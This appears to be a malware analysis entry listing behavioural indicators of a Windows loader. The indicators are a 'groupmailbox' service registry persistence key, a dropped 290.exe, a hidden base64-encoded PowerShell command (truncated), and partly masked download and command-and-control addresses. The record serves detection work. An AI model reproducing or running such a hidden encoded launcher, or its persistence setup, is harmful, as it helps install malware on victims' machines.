Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\groupmailbox] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\groupmailbox] 'ImagePath' = '"%WINDIR%\SysWOW64\groupmailbox.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAG0AeAB3AHQAbQBiAG4AZwBoAHYAdAA9ACcASQBkAHMAbAB0AGcAdgBvAHQAaAB2AGsAJwA7ACQAQgB0AGoAagB2AGMAcAB5AGQAdAAgAD0AIAAnADIAOQAwACcAOwAkAE0AagBsAHMAcQB3AHoAZABqAD0AJwBYAGcAZAB1AHgAcAB...
- %HOMEPATH%\290.exe
- %HOMEPATH%\290.exe в %WINDIR%\syswow64\groupmailbox.exe
- http://bl####knetwork.com/wp-content/260shby-cdsu5t59-05/
- http://59.###.126.129:443/7rRLiKe6jXU3gYbT via 59.##5.126.129
- DNS ASK bl####knetwork.com
- '%HOMEPATH%\290.exe'
- '%WINDIR%\syswow64\groupmailbox.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAG0AeAB3AHQAbQBiAG4AZwBoAHYAdAA9ACcASQBkAHMAbAB0AGcAdgBvAHQAaAB2AGsAJwA7ACQAQgB0AGoAagB2AGMAcAB5AGQAdAAgAD0AIAAnADIAOQAwACcAOwAkAE0AagBsAHMAcQB3AHoAZABqAD0AJwBYAGcAZAB1AHgAcAB...' (со скрытым окном)